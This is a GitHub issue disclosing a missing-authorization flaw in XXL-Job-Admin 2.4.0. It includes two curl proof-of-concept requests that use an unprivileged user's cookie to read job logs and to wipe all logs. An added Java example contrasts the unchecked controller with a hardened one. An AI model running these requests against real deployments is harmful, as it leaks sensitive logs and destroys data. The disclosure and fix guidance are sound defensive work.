xuxueli / xxl-job

A distributed task scheduling framework. (Distributed task scheduling platform XXL-JOB)
http://www.xuxueli.com/xxl-job/
GNU General Public License v3.0
27.45k stars, 10.86k forks

Permission Vulnerability of Path /xxl-job-admin/joblog/clearLog & /xxl-job-admin/joblog/logDetailCat #3330

Open N0th1n3 opened 11 months ago

N0th1n3 commented 11 months ago

Environment

MySQL 5.7.44, XXL-Job-Admin 2.4.0
Virtual Machine 1: Ubuntu 22.04.3 (as XXL-Job-Admin)
Virtual Machine 2: Ubuntu 22.04.3 (as XXL-Job-Executor)

Vulnerability Information

It was found that the direct query of xxl-job-admin/joblog/clearLog and /xxl-job-admin/joblog/logDetailPage does not validate user privilege and induces risk of sensitive information leakage and loss.

Steps to reproduce the behavior

Step 1: Create a normal user without any privilege inside the web console, as in the image below. [image]

Step 2: Retrieve the cookie for the user. [image]

Step 3: Run the following command for testing log query:

    curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/logDetailCat" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'logId=9&fromLineNum=1'

[image] It shows the successful log query and returns a 200 status.

Step 4: Run the following command for log clearing:

    curl -v -X POST "http://<IP address:port>/xxl-job-admin/joblog/clearLog" --cookie "XXL_JOB_LOGIN_IDENTITY=<normal user cookie>" -d 'jobGroup=0&jobId=0&type=9'

[image] It returns a 200 status.

Step 5: Show the logs in the console. It shows that all logs were cleared successfully by the normal user. [image]
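The report describes a missing authorization check: being logged in is the only gate on the two endpoints, so a normal account can read any job's log and clear every log in the instance. The following is an added example, not xxl-job's own code, of how a Spring MVC controller would enforce that check, with the unchecked pattern left as a comment beside the hardened version. `SessionResolver`, `LogService`, `SessionUser` and the `/joblog` mapping are hypothetical stand-ins for the application's session lookup, log storage and user model; only the cookie name and the endpoint paths come from the report.

```java
// Added example, not xxl-job project code: an explicit authorization check in front of
// the two endpoints named in the report. SessionResolver, LogService and SessionUser are
// hypothetical stand-ins for the application's session lookup, log storage and user model.
package example;

import java.util.Set;
import org.springframework.http.HttpStatus;
import org.springframework.web.bind.annotation.CookieValue;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RequestParam;
import org.springframework.web.bind.annotation.RestController;
import org.springframework.web.server.ResponseStatusException;

@RestController
@RequestMapping("/joblog")
public class JobLogController {

    /** Session principal (hypothetical): admin flag plus the job groups a normal user may see. */
    public record SessionUser(String username, boolean admin, Set<Integer> jobGroups) {}

    /** Maps the login cookie to a user, or null when the cookie is absent or invalid (hypothetical). */
    public interface SessionResolver { SessionUser resolve(String loginIdentity); }

    /** Log storage (hypothetical). */
    public interface LogService {
        int jobGroupOf(long logId);                       // job group owning a log entry
        String readLines(long logId, int fromLineNum);    // log content from a line offset
        void clear(int jobGroup, int jobId, int type);    // delete logs by group/job/type
    }

    private final SessionResolver sessions;
    private final LogService logs;

    public JobLogController(SessionResolver sessions, LogService logs) {
        this.sessions = sessions;
        this.logs = logs;
    }

    // Unchecked pattern described in the report: the session cookie proves only that the
    // caller is logged in, so a normal user reaches a destructive, instance-wide action.
    //
    // @PostMapping("/clearLog")
    // public String clearLog(@RequestParam int jobGroup, @RequestParam int jobId, @RequestParam int type) {
    //     logs.clear(jobGroup, jobId, type);
    //     return "ok";
    // }

    // Hardened: clearing logs is restricted to admins.
    @PostMapping("/clearLog")
    public String clearLog(@CookieValue(value = "XXL_JOB_LOGIN_IDENTITY", required = false) String identity,
                           @RequestParam int jobGroup, @RequestParam int jobId, @RequestParam int type) {
        SessionUser user = requireLogin(identity);
        if (!user.admin()) {
            throw new ResponseStatusException(HttpStatus.FORBIDDEN, "admin role required");
        }
        logs.clear(jobGroup, jobId, type);
        return "ok";
    }

    // Hardened: log content is readable by admins, or by a normal user only for job groups
    // that were granted to that user. The check is keyed on the log's owning group, not on
    // anything the caller supplies.
    @PostMapping("/logDetailCat")
    public String logDetailCat(@CookieValue(value = "XXL_JOB_LOGIN_IDENTITY", required = false) String identity,
                               @RequestParam long logId, @RequestParam int fromLineNum) {
        SessionUser user = requireLogin(identity);
        int owner = logs.jobGroupOf(logId);
        if (!user.admin() && !user.jobGroups().contains(owner)) {
            throw new ResponseStatusException(HttpStatus.FORBIDDEN, "no permission on job group " + owner);
        }
        return logs.readLines(logId, fromLineNum);
    }

    // Authentication is checked first and separately from authorization, so an anonymous
    // request gets 401 while a logged-in but unprivileged one gets 403.
    private SessionUser requireLogin(String identity) {
        SessionUser user = identity == null ? null : sessions.resolve(identity);
        if (user == null) {
            throw new ResponseStatusException(HttpStatus.UNAUTHORIZED, "login required");
        }
        return user;
    }
}
```

With a check of this shape in place, re-running the two curl commands from steps 3 and 4 with a normal user's cookie is the regression test: both should come back 403 rather than 200, and the request with no cookie should come back 401. Whatever mechanism a project uses (an interceptor driven by a per-handler annotation, or inline checks like the ones above), the property to verify is that the decision is made per endpoint and per resource, not once at login.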

75ACOL commented 10 months ago

Create an unprivileged user and get its cookie, which I don't think is easy for attackers.

N0th1n3 commented 10 months ago

Agree. The assumption of the attack is that you gained an unprivileged account.